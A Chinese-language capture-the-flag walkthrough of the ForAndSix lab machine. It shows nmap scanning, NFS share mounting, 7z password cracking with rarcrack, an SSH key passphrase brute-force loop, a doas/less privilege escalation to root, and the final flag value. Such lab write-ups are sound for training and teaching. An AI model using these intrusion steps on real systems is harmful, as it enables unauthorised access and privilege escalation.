ForAndSix

靶机下载地址：https://pan.baidu.com/s/1xmZA1xUU_oDTwllIJNSwlA

　　　提款码：6666

靶机IP地址：192.168.137.128

Kali IP地址：192.168.137.137

 

获取靶机开放端口的服务版本信息

• nmap -sV 192.168.137.128

发现目标系统开启ssh服务（OpenSSH 7.9）、nsf服务（网络文件系统）

 

 

查看靶机的共享目录

使用msf中的模块use auxiliary/scanner/nfs/nfsmount

 

 

使用命令查看共享目录：shutmunt -e 192.168.137.128

 

 

 

  

远程挂载靶机的目录

首先安装nfspysh

链接：https://pan.baidu.com/s/1R5ICg94APAkY8sX_lmDzvQ

提取码：0nu7

• 进入目录安装：
• ./setup.py install

 

  安装NfSpy-twofour

• 进入目录安装：
• ./setup.py install

 

 

 

 挂载到showmount查看共享目录的路径

• nfspysh -o server=192.168.137.128:/home/user/storage

 

查看共享目录的内容，下载backup.7z压缩包

• ls

 

 

 

 解压backup.7z文件，发现文件被加密

• 7z e backup.7z

 

使用rarcrack对7z类的压缩包进行爆破

• apt-get install rarcrack

 

进行爆破

• rarcrack --threads 6 --type 7z backup.7z

获取到解压密码：chocolate

 由于爆破的时间过于长久就没有截图了，

 

 

解压后获得8张图片和ssh公钥和私钥

 

把公钥复制到/root/.ssh尝试使用ssh私钥登录目标，发现私钥进行了口令验证

 

使用脚本爆破私钥密码

• cat /usr/share/wordlists/metasploit/adobe_top100_pass.txt  |while read pass;do if ssh-keygen -c -C "user@forandsix" -P $pass -f id_rsa &>/dev/null;then echo $pass; break; fi; done

获取密码12345678

 

对用户进行ssh登录

由于是$符号所以直接判定为普通用户

 

使用find命令进行查看是否存在可执行的二进制文件，和带有s标志位的文件

 

发现可以使用可以使用doas（可以代替sudo命令是BSD系列系统的权限管理工具）

• find / -perm 4000 2>/dev/null
• find / -perm -u=s -type f 2> /dev/null

 

查看doas.conf配置文件信息

 

发现当前用户的权限只能使用less命令查看/var/log/authlog文件

• doas /usr/bin/less /var/log/authlog

按v进入编辑模式进行普通用户提权

 

提权成功，获得root权限

 

查找flag

• find / -name flag.txt

 

获取得到flag

• flag：acd043bc3103ed3dd02eee99d5b0ff42

 

 

 

实验结束

• 还没有人评论，欢迎说说您的想法！